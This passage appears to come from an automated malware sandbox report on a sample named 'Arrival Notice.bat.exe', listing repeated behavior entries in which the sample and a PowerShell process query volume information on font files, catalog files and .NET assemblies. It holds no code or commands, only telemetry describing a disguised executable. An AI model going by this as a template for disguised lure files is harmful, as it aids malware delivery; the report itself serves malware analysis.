              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
